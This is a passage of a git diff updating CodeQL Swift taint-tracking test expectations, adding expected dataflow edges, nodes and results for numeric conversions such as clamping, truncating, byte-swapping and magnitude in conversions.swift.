| +| conversions.swift:86:26:86:45 | call to sourceInt(_:) | conversions.swift:86:12:86:46 | call to Self.init(clamping:) | +| conversions.swift:87:29:87:48 | call to sourceInt(_:) | conversions.swift:87:12:87:49 | call to Self.init(clamping:) | +| conversions.swift:88:36:88:55 | call to sourceInt(_:) | conversions.swift:88:12:88:56 | call to Self.init(truncatingIfNeeded:) | +| conversions.swift:89:39:89:58 | call to sourceInt(_:) | conversions.swift:89:12:89:59 | call to Self.init(truncatingIfNeeded:) | | conversions.swift:90:12:90:50 | call to Self.init(_:radix:) | conversions.swift:90:12:90:51 | ...! | | conversions.swift:91:12:91:53 | call to Self.init(_:radix:) | conversions.swift:91:12:91:54 | ...! | | conversions.swift:93:30:93:49 | call to sourceInt(_:) | conversions.swift:93:12:93:50 | call to Self.init(littleEndian:) | @@ -122,6 +146,7 @@ | conversions.swift:131:12:131:12 | [post] pair4 | conversions.swift:132:12:132:12 | pair4 | | conversions.swift:131:12:131:12 | pair4 | conversions.swift:132:12:132:12 | pair4 | | conversions.swift:137:18:137:39 | call to sourceFloat(_:) | conversions.swift:137:12:137:40 | call to Float.init(_:) | +| conversions.swift:138:18:138:39 | call to sourceFloat(_:) | conversions.swift:138:12:138:40 | call to UInt8.init(_:) | | conversions.swift:139:19:139:40 | call to sourceFloat(_:) | conversions.swift:139:12:139:41 | call to String.init(_:) | | conversions.swift:140:12:140:41 | call to String.init(_:) | conversions.swift:140:12:140:43 | .utf8 | | conversions.swift:140:19:140:40 | call to sourceFloat(_:) | conversions.swift:140:12:140:41 | call to String.init(_:) | 
@@ -144,6 +169,10 @@ | conversions.swift:155:12:155:35 | call to sourceFloat80(_:) | conversions.swift:155:12:155:37 | .significand | | conversions.swift:156:12:156:34 | call to sourceDouble(_:) | conversions.swift:156:12:156:36 | .exponent | | conversions.swift:157:12:157:34 | call to sourceDouble(_:) | conversions.swift:157:12:157:36 | .significand | +| conversions.swift:158:12:158:32 | call to sourceUInt(_:) | conversions.swift:158:12:158:34 | .byteSwapped | +| conversions.swift:159:12:159:34 | call to sourceUInt64(_:) | conversions.swift:159:12:159:36 | .byteSwapped | +| conversions.swift:160:12:160:31 | call to sourceInt(_:) | conversions.swift:160:12:160:33 | .magnitude | +| conversions.swift:161:12:161:35 | call to sourceUInt64(_:) | conversions.swift:161:12:161:37 | .magnitude | | conversions.swift:166:19:166:42 | call to sourceString(_:) | conversions.swift:166:12:166:43 | call to String.init(_:) | | conversions.swift:168:6:168:6 | SSA def(ms1) | conversions.swift:169:12:169:12 | ms1 | | conversions.swift:168:6:168:6 | ms1 | conversions.swift:168:6:168:6 | SSA def(ms1) | @@ -186,6 +215,8 @@ | conversions.swift:186:40:186:40 | parent | conversions.swift:186:25:186:69 | call to unsafeDowncast(_:to:) | | conversions.swift:187:12:187:12 | [post] v3 | conversions.swift:188:12:188:12 | v3 | | conversions.swift:187:12:187:12 | v3 | conversions.swift:188:12:188:12 | v3 | +| conversions.swift:195:24:195:24 | myCEnumConst | conversions.swift:195:12:195:36 | call to Self.init(_:) | +| conversions.swift:196:24:196:41 | call to sourceInt(_:) | conversions.swift:196:12:196:42 | call to Self.init(_:) | | conversions.swift:199:7:199:7 | SSA def(self) | conversions.swift:199:7:199:7 | self[return] | | conversions.swift:199:7:199:7 | self | conversions.swift:199:7:199:7 | SSA def(self) | | conversions.swift:200:2:200:2 | SSA def(self) | conversions.swift:200:2:221:2 | self[return] | 
@@ -248,6 +279,7 @@ | conversions.swift:236:13:236:13 | withUInt | conversions.swift:237:14:237:14 | withUInt | | conversions.swift:237:3:237:22 | SSA def(self) | conversions.swift:238:12:238:12 | self | | conversions.swift:237:10:237:22 | call to Self.init(_:) | conversions.swift:237:3:237:22 | SSA def(self) | +| conversions.swift:237:14:237:14 | withUInt | conversions.swift:237:10:237:22 | call to Self.init(_:) | | conversions.swift:238:12:238:12 | [post] self | conversions.swift:235:2:239:2 | self[return] | | conversions.swift:238:12:238:12 | self | conversions.swift:235:2:239:2 | self[return] | | conversions.swift:241:7:241:20 | SSA def(withMyValue) | conversions.swift:242:13:242:13 | withMyValue | diff --git a/swift/ql/test/library-tests/dataflow/taint/core/Taint.expected b/swift/ql/test/library-tests/dataflow/taint/core/Taint.expected index e7dc06ad325..7563f217355 100644 --- a/swift/ql/test/library-tests/dataflow/taint/core/Taint.expected +++ b/swift/ql/test/library-tests/dataflow/taint/core/Taint.expected 
@@ -1,4 +1,14 @@ edges +| conversions.swift:33:16:33:35 | call to sourceInt(_:) | conversions.swift:33:12:33:36 | call to Self.init(_:) | provenance | | +| conversions.swift:34:17:34:36 | call to sourceInt(_:) | conversions.swift:34:12:34:37 | call to Self.init(_:) | provenance | | +| conversions.swift:35:18:35:37 | call to sourceInt(_:) | conversions.swift:35:12:35:38 | call to Self.init(_:) | provenance | | +| conversions.swift:36:18:36:37 | call to sourceInt(_:) | conversions.swift:36:12:36:38 | call to Self.init(_:) | provenance | | +| conversions.swift:37:18:37:37 | call to sourceInt(_:) | conversions.swift:37:12:37:38 | call to Self.init(_:) | provenance | | +| conversions.swift:39:17:39:36 | call to sourceInt(_:) | conversions.swift:39:12:39:37 | call to Self.init(_:) | provenance | | +| conversions.swift:40:18:40:37 | call to sourceInt(_:) | conversions.swift:40:12:40:38 | call to Self.init(_:) | provenance | | +| conversions.swift:41:19:41:39 | call to sourceInt(_:) | conversions.swift:41:12:41:40 | call to Self.init(_:) | provenance | | +| conversions.swift:42:19:42:39 | call to sourceInt(_:) | conversions.swift:42:12:42:40 | call to Self.init(_:) | provenance | | +| conversions.swift:43:19:43:39 | call to sourceInt(_:) | conversions.swift:43:12:43:40 | call to Self.init(_:) | provenance | | | conversions.swift:45:18:45:38 | call to sourceInt(_:) | conversions.swift:45:12:45:39 | call to Float.init(_:) | provenance | | | conversions.swift:46:19:46:39 | call to sourceInt(_:) | conversions.swift:46:12:46:40 | call to Double.init(_:) | provenance | | | conversions.swift:47:19:47:39 | call to sourceInt(_:) | conversions.swift:47:12:47:40 | call to String.init(_:) | provenance | | 
@@ -23,8 +33,22 @@ edges | conversions.swift:62:30:62:49 | call to sourceInt(_:) | conversions.swift:62:18:62:50 | call to numericCast(_:) | provenance | | | conversions.swift:65:17:65:66 | call to unsafeBitCast(_:to:) | conversions.swift:66:12:66:12 | v4 | provenance | | | conversions.swift:65:31:65:50 | call to sourceInt(_:) | conversions.swift:65:17:65:66 | call to unsafeBitCast(_:to:) | provenance | | +| conversions.swift:68:11:68:56 | call to Self.init(truncatingIfNeeded:) | conversions.swift:69:12:69:12 | v5 | provenance | | +| conversions.swift:68:36:68:55 | call to sourceInt(_:) | conversions.swift:68:11:68:56 | call to Self.init(truncatingIfNeeded:) | provenance | | +| conversions.swift:71:11:71:48 | call to UInt.init(bitPattern:) | conversions.swift:72:12:72:12 | v6 | provenance | | +| conversions.swift:71:28:71:47 | call to sourceInt(_:) | conversions.swift:71:11:71:48 | call to UInt.init(bitPattern:) | provenance | | | conversions.swift:74:11:74:35 | call to abs(_:) | conversions.swift:75:12:75:12 | v7 | provenance | | | conversions.swift:74:15:74:34 | call to sourceInt(_:) | conversions.swift:74:11:74:35 | call to abs(_:) | provenance | | +| conversions.swift:80:28:80:47 | call to sourceInt(_:) | conversions.swift:80:12:80:48 | call to advanced(by:) | provenance | | +| conversions.swift:82:28:82:50 | call to sourceUInt64(_:) | conversions.swift:82:12:82:51 | call to distance(to:) | provenance | | +| conversions.swift:84:12:84:45 | call to Self.init(exactly:) [some:0] | conversions.swift:84:12:84:46 | ...! | provenance | | +| conversions.swift:84:25:84:44 | call to sourceInt(_:) | conversions.swift:84:12:84:45 | call to Self.init(exactly:) [some:0] | provenance | | +| conversions.swift:85:12:85:48 | call to Self.init(exactly:) [some:0] | conversions.swift:85:12:85:49 | ...! 
| provenance | | +| conversions.swift:85:28:85:47 | call to sourceInt(_:) | conversions.swift:85:12:85:48 | call to Self.init(exactly:) [some:0] | provenance | | +| conversions.swift:86:26:86:45 | call to sourceInt(_:) | conversions.swift:86:12:86:46 | call to Self.init(clamping:) | provenance | | +| conversions.swift:87:29:87:48 | call to sourceInt(_:) | conversions.swift:87:12:87:49 | call to Self.init(clamping:) | provenance | | +| conversions.swift:88:36:88:55 | call to sourceInt(_:) | conversions.swift:88:12:88:56 | call to Self.init(truncatingIfNeeded:) | provenance | | +| conversions.swift:89:39:89:58 | call to sourceInt(_:) | conversions.swift:89:12:89:59 | call to Self.init(truncatingIfNeeded:) | provenance | | | conversions.swift:90:12:90:50 | call to Self.init(_:radix:) [some:0] | conversions.swift:90:12:90:51 | ...! | provenance | | | conversions.swift:90:16:90:38 | call to sourceString(_:) | conversions.swift:90:12:90:50 | call to Self.init(_:radix:) [some:0] | provenance | | | conversions.swift:91:12:91:53 | call to Self.init(_:radix:) [some:0] | conversions.swift:91:12:91:54 | ...! | provenance | | 
@@ -38,6 +62,7 @@ edges | conversions.swift:99:12:99:31 | call to sourceInt(_:) | conversions.swift:99:12:99:33 | .bigEndian | provenance | | | conversions.swift:100:12:100:34 | call to sourceUInt64(_:) | conversions.swift:100:12:100:36 | .bigEndian | provenance | | | conversions.swift:137:18:137:39 | call to sourceFloat(_:) | conversions.swift:137:12:137:40 | call to Float.init(_:) | provenance | | +| conversions.swift:138:18:138:39 | call to sourceFloat(_:) | conversions.swift:138:12:138:40 | call to UInt8.init(_:) | provenance | | | conversions.swift:139:19:139:40 | call to sourceFloat(_:) | conversions.swift:139:12:139:41 | call to String.init(_:) | provenance | | | conversions.swift:140:12:140:41 | call to String.init(_:) | conversions.swift:140:12:140:43 | .utf8 | provenance | | | conversions.swift:140:19:140:40 | call to sourceFloat(_:) | conversions.swift:140:12:140:41 | call to String.init(_:) | provenance | | 
@@ -57,6 +82,10 @@ edges | conversions.swift:155:12:155:35 | call to sourceFloat80(_:) | conversions.swift:155:12:155:37 | .significand | provenance | | | conversions.swift:156:12:156:34 | call to sourceDouble(_:) | conversions.swift:156:12:156:36 | .exponent | provenance | | | conversions.swift:157:12:157:34 | call to sourceDouble(_:) | conversions.swift:157:12:157:36 | .significand | provenance | | +| conversions.swift:158:12:158:32 | call to sourceUInt(_:) | conversions.swift:158:12:158:34 | .byteSwapped | provenance | | +| conversions.swift:159:12:159:34 | call to sourceUInt64(_:) | conversions.swift:159:12:159:36 | .byteSwapped | provenance | | +| conversions.swift:160:12:160:31 | call to sourceInt(_:) | conversions.swift:160:12:160:33 | .magnitude | provenance | | +| conversions.swift:161:12:161:35 | call to sourceUInt64(_:) | conversions.swift:161:12:161:37 | .magnitude | provenance | | | conversions.swift:166:19:166:42 | call to sourceString(_:) | conversions.swift:166:12:166:43 | call to String.init(_:) | provenance | | | conversions.swift:174:12:174:45 | call to MyString.init(_:) | conversions.swift:174:12:174:45 | call to MyString.init(_:) [some:0] | provenance | | | conversions.swift:174:12:174:45 | call to MyString.init(_:) | conversions.swift:175:12:175:12 | ms2 | provenance | | 
@@ -73,6 +102,7 @@ edges | conversions.swift:186:25:186:69 | call to unsafeDowncast(_:to:) | conversions.swift:187:12:187:12 | v3 | provenance | | | conversions.swift:186:25:186:69 | call to unsafeDowncast(_:to:) | conversions.swift:188:12:188:12 | v3 | provenance | | | conversions.swift:186:40:186:40 | parent | conversions.swift:186:25:186:69 | call to unsafeDowncast(_:to:) | provenance | | +| conversions.swift:196:24:196:41 | call to sourceInt(_:) | conversions.swift:196:12:196:42 | call to Self.init(_:) | provenance | | | conversions.swift:201:14:201:33 | call to sourceArray(_:) | conversions.swift:203:13:203:13 | arr1 | provenance | | | conversions.swift:201:14:201:33 | call to sourceArray(_:) | conversions.swift:205:13:205:19 | ...[...] | provenance | | | conversions.swift:201:14:201:33 | call to sourceArray(_:) | conversions.swift:208:25:208:25 | arr1 | provenance | | 
@@ -104,6 +134,10 @@ edges | conversions.swift:230:3:230:3 | [post] self [v] | conversions.swift:229:2:231:2 | self[return] [v] | provenance | | | conversions.swift:230:12:230:12 | v | conversions.swift:230:3:230:3 | [post] self [v] | provenance | | | conversions.swift:235:7:235:17 | withUInt | conversions.swift:236:13:236:13 | withUInt | provenance | | +| conversions.swift:235:7:235:17 | withUInt | conversions.swift:237:14:237:14 | withUInt | provenance | | +| conversions.swift:237:10:237:22 | call to Self.init(_:) | conversions.swift:235:2:239:2 | self[return] | provenance | | +| conversions.swift:237:10:237:22 | call to Self.init(_:) | conversions.swift:238:12:238:12 | self | provenance | | +| conversions.swift:237:14:237:14 | withUInt | conversions.swift:237:10:237:22 | call to Self.init(_:) | provenance | | | conversions.swift:241:7:241:20 | withMyValue [v] | conversions.swift:242:13:242:13 | withMyValue [v] | provenance | | | conversions.swift:242:13:242:13 | withMyValue [v] | conversions.swift:227:6:227:6 | self [v] | provenance | | | conversions.swift:242:13:242:13 | withMyValue [v] | conversions.swift:242:13:242:25 | .v | provenance | | 
@@ -122,6 +156,7 @@ edges | conversions.swift:256:10:256:10 | withMyValue [v] | conversions.swift:227:6:227:6 | self [v] | provenance | | | conversions.swift:256:10:256:10 | withMyValue [v] | conversions.swift:256:10:256:22 | .v | provenance | | | conversions.swift:262:26:262:43 | call to sourceUInt(_:) | conversions.swift:235:7:235:17 | withUInt | provenance | | +| conversions.swift:262:26:262:43 | call to sourceUInt(_:) | conversions.swift:262:12:262:44 | call to Int.init(withUInt:) | provenance | | | conversions.swift:265:29:265:54 | call to MyValue.init(_:) [v] | conversions.swift:241:7:241:20 | withMyValue [v] | provenance | | | conversions.swift:265:37:265:53 | call to sourceInt(_:) | conversions.swift:229:7:229:12 | v | provenance | | | conversions.swift:265:37:265:53 | call to sourceInt(_:) | conversions.swift:265:29:265:54 | call to MyValue.init(_:) [v] | provenance | | 
@@ -217,6 +252,26 @@ edges | try.swift:18:18:18:25 | call to source() [some:0] | try.swift:18:13:18:25 | try? ... [some:0] | provenance | | nodes | conversions.swift:32:12:32:31 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | +| conversions.swift:33:12:33:36 | call to Self.init(_:) | semmle.label | call to Self.init(_:) | +| conversions.swift:33:16:33:35 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | +| conversions.swift:34:12:34:37 | call to Self.init(_:) | semmle.label | call to Self.init(_:) | +| conversions.swift:34:17:34:36 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | +| conversions.swift:35:12:35:38 | call to Self.init(_:) | semmle.label | call to Self.init(_:) | +| conversions.swift:35:18:35:37 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | +| conversions.swift:36:12:36:38 | call to Self.init(_:) | semmle.label | call to Self.init(_:) | +| conversions.swift:36:18:36:37 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | +| conversions.swift:37:12:37:38 | call to Self.init(_:) | semmle.label | call to Self.init(_:) | +| conversions.swift:37:18:37:37 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | +| conversions.swift:39:12:39:37 | call to Self.init(_:) | semmle.label | call to Self.init(_:) | +| conversions.swift:39:17:39:36 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | +| conversions.swift:40:12:40:38 | call to Self.init(_:) | semmle.label | call to Self.init(_:) | +| conversions.swift:40:18:40:37 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | +| conversions.swift:41:12:41:40 | call to Self.init(_:) | semmle.label | call to Self.init(_:) | +| conversions.swift:41:19:41:39 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | +| conversions.swift:42:12:42:40 | call to Self.init(_:) | semmle.label | call to Self.init(_:) | +| conversions.swift:42:19:42:39 | call to sourceInt(_:) | semmle.label | call to 
sourceInt(_:) | +| conversions.swift:43:12:43:40 | call to Self.init(_:) | semmle.label | call to Self.init(_:) | +| conversions.swift:43:19:43:39 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | | conversions.swift:45:12:45:39 | call to Float.init(_:) | semmle.label | call to Float.init(_:) | | conversions.swift:45:18:45:38 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | | conversions.swift:46:12:46:40 | call to Double.init(_:) | semmle.label | call to Double.init(_:) | 
@@ -251,9 +306,33 @@ nodes | conversions.swift:65:17:65:66 | call to unsafeBitCast(_:to:) | semmle.label | call to unsafeBitCast(_:to:) | | conversions.swift:65:31:65:50 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | | conversions.swift:66:12:66:12 | v4 | semmle.label | v4 | +| conversions.swift:68:11:68:56 | call to Self.init(truncatingIfNeeded:) | semmle.label | call to Self.init(truncatingIfNeeded:) | +| conversions.swift:68:36:68:55 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | +| conversions.swift:69:12:69:12 | v5 | semmle.label | v5 | +| conversions.swift:71:11:71:48 | call to UInt.init(bitPattern:) | semmle.label | call to UInt.init(bitPattern:) | +| conversions.swift:71:28:71:47 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | +| conversions.swift:72:12:72:12 | v6 | semmle.label | v6 | | conversions.swift:74:11:74:35 | call to abs(_:) | semmle.label | call to abs(_:) | | conversions.swift:74:15:74:34 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | | conversions.swift:75:12:75:12 | v7 | semmle.label | v7 | +| conversions.swift:80:12:80:48 | call to advanced(by:) | semmle.label | call to advanced(by:) | +| conversions.swift:80:28:80:47 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | +| conversions.swift:82:12:82:51 | call to distance(to:) | semmle.label | call to distance(to:) | +| conversions.swift:82:28:82:50 | call to sourceUInt64(_:) | semmle.label | call to sourceUInt64(_:) | +| conversions.swift:84:12:84:45 | call to Self.init(exactly:) [some:0] | semmle.label | call to Self.init(exactly:) [some:0] | +| conversions.swift:84:12:84:46 | ...! | semmle.label | ...! | +| conversions.swift:84:25:84:44 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | +| conversions.swift:85:12:85:48 | call to Self.init(exactly:) [some:0] | semmle.label | call to Self.init(exactly:) [some:0] | +| conversions.swift:85:12:85:49 | ...! | semmle.label | ...! 
| +| conversions.swift:85:28:85:47 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | +| conversions.swift:86:12:86:46 | call to Self.init(clamping:) | semmle.label | call to Self.init(clamping:) | +| conversions.swift:86:26:86:45 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | +| conversions.swift:87:12:87:49 | call to Self.init(clamping:) | semmle.label | call to Self.init(clamping:) | +| conversions.swift:87:29:87:48 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | +| conversions.swift:88:12:88:56 | call to Self.init(truncatingIfNeeded:) | semmle.label | call to Self.init(truncatingIfNeeded:) | +| conversions.swift:88:36:88:55 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | +| conversions.swift:89:12:89:59 | call to Self.init(truncatingIfNeeded:) | semmle.label | call to Self.init(truncatingIfNeeded:) | +| conversions.swift:89:39:89:58 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | | conversions.swift:90:12:90:50 | call to Self.init(_:radix:) [some:0] | semmle.label | call to Self.init(_:radix:) [some:0] | | conversions.swift:90:12:90:51 | ...! | semmle.label | ...! | | conversions.swift:90:16:90:38 | call to sourceString(_:) | semmle.label | call to sourceString(_:) | 
@@ -279,6 +358,8 @@ nodes | conversions.swift:136:12:136:33 | call to sourceFloat(_:) | semmle.label | call to sourceFloat(_:) | | conversions.swift:137:12:137:40 | call to Float.init(_:) | semmle.label | call to Float.init(_:) | | conversions.swift:137:18:137:39 | call to sourceFloat(_:) | semmle.label | call to sourceFloat(_:) | +| conversions.swift:138:12:138:40 | call to UInt8.init(_:) | semmle.label | call to UInt8.init(_:) | +| conversions.swift:138:18:138:39 | call to sourceFloat(_:) | semmle.label | call to sourceFloat(_:) | | conversions.swift:139:12:139:41 | call to String.init(_:) | semmle.label | call to String.init(_:) | | conversions.swift:139:19:139:40 | call to sourceFloat(_:) | semmle.label | call to sourceFloat(_:) | | conversions.swift:140:12:140:41 | call to String.init(_:) | semmle.label | call to String.init(_:) | 
@@ -314,6 +395,14 @@ nodes | conversions.swift:156:12:156:36 | .exponent | semmle.label | .exponent | | conversions.swift:157:12:157:34 | call to sourceDouble(_:) | semmle.label | call to sourceDouble(_:) | | conversions.swift:157:12:157:36 | .significand | semmle.label | .significand | +| conversions.swift:158:12:158:32 | call to sourceUInt(_:) | semmle.label | call to sourceUInt(_:) | +| conversions.swift:158:12:158:34 | .byteSwapped | semmle.label | .byteSwapped | +| conversions.swift:159:12:159:34 | call to sourceUInt64(_:) | semmle.label | call to sourceUInt64(_:) | +| conversions.swift:159:12:159:36 | .byteSwapped | semmle.label | .byteSwapped | +| conversions.swift:160:12:160:31 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | +| conversions.swift:160:12:160:33 | .magnitude | semmle.label | .magnitude | +| conversions.swift:161:12:161:35 | call to sourceUInt64(_:) | semmle.label | call to sourceUInt64(_:) | +| conversions.swift:161:12:161:37 | .magnitude | semmle.label | .magnitude | | conversions.swift:165:12:165:35 | call to sourceString(_:) | semmle.label | call to sourceString(_:) | | conversions.swift:166:12:166:43 | call to String.init(_:) | semmle.label | call to String.init(_:) | | conversions.swift:166:19:166:42 | call to sourceString(_:) | semmle.label | call to sourceString(_:) | 
@@ -331,6 +420,8 @@ nodes | conversions.swift:186:40:186:40 | parent | semmle.label | parent | | conversions.swift:187:12:187:12 | v3 | semmle.label | v3 | | conversions.swift:188:12:188:12 | v3 | semmle.label | v3 | +| conversions.swift:196:12:196:42 | call to Self.init(_:) | semmle.label | call to Self.init(_:) | +| conversions.swift:196:24:196:41 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | | conversions.swift:201:14:201:33 | call to sourceArray(_:) | semmle.label | call to sourceArray(_:) | | conversions.swift:202:14:202:33 | [...] [Collection element] | semmle.label | [...] [Collection element] | | conversions.swift:202:15:202:32 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | @@ -364,8 +455,12 @@ nodes | conversions.swift:229:7:229:12 | v | semmle.label | v | | conversions.swift:230:3:230:3 | [post] self [v] | semmle.label | [post] self [v] | | conversions.swift:230:12:230:12 | v | semmle.label | v | +| conversions.swift:235:2:239:2 | self[return] | semmle.label | self[return] | | conversions.swift:235:7:235:17 | withUInt | semmle.label | withUInt | | conversions.swift:236:13:236:13 | withUInt | semmle.label | withUInt | +| conversions.swift:237:10:237:22 | call to Self.init(_:) | semmle.label | call to Self.init(_:) | +| conversions.swift:237:14:237:14 | withUInt | semmle.label | withUInt | +| conversions.swift:238:12:238:12 | self | semmle.label | self | | conversions.swift:241:7:241:20 | withMyValue [v] | semmle.label | withMyValue [v] | | conversions.swift:242:13:242:13 | withMyValue [v] | semmle.label | withMyValue [v] | | conversions.swift:242:13:242:25 | .v | semmle.label | .v | 
@@ -381,6 +476,7 @@ nodes | conversions.swift:255:13:255:25 | .v | semmle.label | .v | | conversions.swift:256:10:256:10 | withMyValue [v] | semmle.label | withMyValue [v] | | conversions.swift:256:10:256:22 | .v | semmle.label | .v | +| conversions.swift:262:12:262:44 | call to Int.init(withUInt:) | semmle.label | call to Int.init(withUInt:) | | conversions.swift:262:26:262:43 | call to sourceUInt(_:) | semmle.label | call to sourceUInt(_:) | | conversions.swift:265:29:265:54 | call to MyValue.init(_:) [v] | semmle.label | call to MyValue.init(_:) [v] | | conversions.swift:265:37:265:53 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | 
@@ -520,6 +616,7 @@ subpaths | conversions.swift:249:11:249:11 | withMyValue2 [v] | conversions.swift:227:6:227:6 | self [v] | file://:0:0:0:0 | .v | conversions.swift:249:11:249:24 | .v | | conversions.swift:255:13:255:13 | withMyValue [v] | conversions.swift:227:6:227:6 | self [v] | file://:0:0:0:0 | .v | conversions.swift:255:13:255:25 | .v | | conversions.swift:256:10:256:10 | withMyValue [v] | conversions.swift:227:6:227:6 | self [v] | file://:0:0:0:0 | .v | conversions.swift:256:10:256:22 | .v | +| conversions.swift:262:26:262:43 | call to sourceUInt(_:) | conversions.swift:235:7:235:17 | withUInt | conversions.swift:235:2:239:2 | self[return] | conversions.swift:262:12:262:44 | call to Int.init(withUInt:) | | conversions.swift:265:37:265:53 | call to sourceInt(_:) | conversions.swift:229:7:229:12 | v | conversions.swift:229:2:231:2 | self[return] [v] | conversions.swift:265:29:265:54 | call to MyValue.init(_:) [v] | | conversions.swift:268:30:268:55 | call to MyValue.init(_:) [v] | conversions.swift:247:7:247:21 | withMyValue2 [v] | conversions.swift:247:2:252:2 | self[return] | conversions.swift:268:12:268:56 | call to Int.init(withMyValue2:) | | conversions.swift:268:38:268:54 | call to sourceInt(_:) | conversions.swift:229:7:229:12 | v | conversions.swift:229:2:231:2 | self[return] [v] | conversions.swift:268:30:268:55 | call to MyValue.init(_:) [v] | 
@@ -534,6 +631,16 @@ subpaths | stringinterpolation.swift:31:21:31:21 | p2 [second] | stringinterpolation.swift:7:6:7:6 | self [second] | file://:0:0:0:0 | .second | stringinterpolation.swift:31:21:31:24 | .second | #select | conversions.swift:32:12:32:31 | call to sourceInt(_:) | conversions.swift:32:12:32:31 | call to sourceInt(_:) | conversions.swift:32:12:32:31 | call to sourceInt(_:) | result | +| conversions.swift:33:12:33:36 | call to Self.init(_:) | conversions.swift:33:16:33:35 | call to sourceInt(_:) | conversions.swift:33:12:33:36 | call to Self.init(_:) | result | +| conversions.swift:34:12:34:37 | call to Self.init(_:) | conversions.swift:34:17:34:36 | call to sourceInt(_:) | conversions.swift:34:12:34:37 | call to Self.init(_:) | result | +| conversions.swift:35:12:35:38 | call to Self.init(_:) | conversions.swift:35:18:35:37 | call to sourceInt(_:) | conversions.swift:35:12:35:38 | call to Self.init(_:) | result | +| conversions.swift:36:12:36:38 | call to Self.init(_:) | conversions.swift:36:18:36:37 | call to sourceInt(_:) | conversions.swift:36:12:36:38 | call to Self.init(_:) | result | +| conversions.swift:37:12:37:38 | call to Self.init(_:) | conversions.swift:37:18:37:37 | call to sourceInt(_:) | conversions.swift:37:12:37:38 | call to Self.init(_:) | result | +| conversions.swift:39:12:39:37 | call to Self.init(_:) | conversions.swift:39:17:39:36 | call to sourceInt(_:) | conversions.swift:39:12:39:37 | call to Self.init(_:) | result | +| conversions.swift:40:12:40:38 | call to Self.init(_:) | conversions.swift:40:18:40:37 | call to sourceInt(_:) | conversions.swift:40:12:40:38 | call to Self.init(_:) | result | +| conversions.swift:41:12:41:40 | call to Self.init(_:) | conversions.swift:41:19:41:39 | call to sourceInt(_:) | conversions.swift:41:12:41:40 | call to Self.init(_:) | result | +| conversions.swift:42:12:42:40 | call to Self.init(_:) | conversions.swift:42:19:42:39 | call to sourceInt(_:) | conversions.swift:42:12:42:40 | call to 
Self.init(_:) | result | +| conversions.swift:43:12:43:40 | call to Self.init(_:) | conversions.swift:43:19:43:39 | call to sourceInt(_:) | conversions.swift:43:12:43:40 | call to Self.init(_:) | result | | conversions.swift:45:12:45:39 | call to Float.init(_:) | conversions.swift:45:18:45:38 | call to sourceInt(_:) | conversions.swift:45:12:45:39 | call to Float.init(_:) | result | | conversions.swift:46:12:46:40 | call to Double.init(_:) | conversions.swift:46:19:46:39 | call to sourceInt(_:) | conversions.swift:46:12:46:40 | call to Double.init(_:) | result | | conversions.swift:47:12:47:40 | call to String.init(_:) | conversions.swift:47:19:47:39 | call to sourceInt(_:) | conversions.swift:47:12:47:40 | call to String.init(_:) | result | 
@@ -547,7 +654,17 @@ subpaths | conversions.swift:59:13:59:13 | v | conversions.swift:58:13:58:32 | call to sourceInt(_:) | conversions.swift:59:13:59:13 | v | result | | conversions.swift:63:12:63:12 | v2 | conversions.swift:62:30:62:49 | call to sourceInt(_:) | conversions.swift:63:12:63:12 | v2 | result | | conversions.swift:66:12:66:12 | v4 | conversions.swift:65:31:65:50 | call to sourceInt(_:) | conversions.swift:66:12:66:12 | v4 | result | +| conversions.swift:69:12:69:12 | v5 | conversions.swift:68:36:68:55 | call to sourceInt(_:) | conversions.swift:69:12:69:12 | v5 | result | +| conversions.swift:72:12:72:12 | v6 | conversions.swift:71:28:71:47 | call to sourceInt(_:) | conversions.swift:72:12:72:12 | v6 | result | | conversions.swift:75:12:75:12 | v7 | conversions.swift:74:15:74:34 | call to sourceInt(_:) | conversions.swift:75:12:75:12 | v7 | result | +| conversions.swift:80:12:80:48 | call to advanced(by:) | conversions.swift:80:28:80:47 | call to sourceInt(_:) | conversions.swift:80:12:80:48 | call to advanced(by:) | result | +| conversions.swift:82:12:82:51 | call to distance(to:) | conversions.swift:82:28:82:50 | call to sourceUInt64(_:) | conversions.swift:82:12:82:51 | call to distance(to:) | result | +| conversions.swift:84:12:84:46 | ...! | conversions.swift:84:25:84:44 | call to sourceInt(_:) | conversions.swift:84:12:84:46 | ...! | result | +| conversions.swift:85:12:85:49 | ...! | conversions.swift:85:28:85:47 | call to sourceInt(_:) | conversions.swift:85:12:85:49 | ...! 
